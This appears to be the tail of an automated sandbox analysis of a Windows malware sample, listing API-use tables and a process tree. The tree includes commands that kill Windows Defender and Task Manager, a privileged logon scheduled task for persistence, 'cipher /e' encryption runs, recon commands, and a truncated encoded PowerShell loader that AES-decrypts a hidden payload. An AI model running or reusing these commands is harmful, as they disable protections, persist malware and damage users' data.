N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 480 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 2016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 480 wrote to memory of 1796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 1564 wrote to memory of 2028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 1932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 2016 wrote to memory of 1940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1932 wrote to memory of 2164 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1564 wrote to memory of 704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 704 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1564 wrote to memory of 1284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 2096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 480 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2856 wrote to memory of 2744 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\vir.exe

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K spread.cmd

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K doxx.cmd

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy 1 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\ipconfig.exe

ipconfig

C:\Windows\SysWOW64\xcopy.exe

xcopy 2 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\net.exe

net accounts

C:\Windows\SysWOW64\xcopy.exe

xcopy 3 C:\Users\Admin\

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts

C:\Windows\SysWOW64\net.exe

net user

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user

C:\Windows\SysWOW64\tasklist.exe

tasklist /apps /v /fo table

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im WindowsDefender.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K handler.cmd

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K cipher.cmd

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe

Rover.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exe

Google.exe

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs"

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:275457 /prefetch:2

C:\Windows\system32\efsui.exe

efsui.exe /efs /keybackup

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\PING.EXE

ping mrbeast.codes -t -n 1 -s 4 -4

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\cipher.exe

cipher /e

C:\Windows\SysWOW64\xcopy.exe

xcopy Google.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy Rover.exe C:\Users\Admin\Desktop

C:\Windows\SysWOW64\xcopy.exe

xcopy spinner.gif C:\Users\Admin\Desktop

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K bloatware.cmd

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe

regmess.exe

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe

1.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe

3.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K SilentSetup.cmd

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat" "

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe

WinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$102F6,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT

C:\Windows\SysWOW64\reg.exe

reg import Setup.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Console.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Desktop.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import International.reg /reg:32

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\reg.exe

reg import Fonts.reg /reg:32

C:\Windows\SysWOW64\reg.exe

reg import Cursors.reg /reg:32

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweakerhelper.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im winaerotweaker.exe /f

C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe

C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=212238&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0xMS0wOFQwOToxOToxOC41NTVaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:406532 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe

scary.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe

the.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll

wimloader.dll

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Program Files\SubDir\Romilyaa.exe

"C:\Program Files\SubDir\Romilyaa.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGB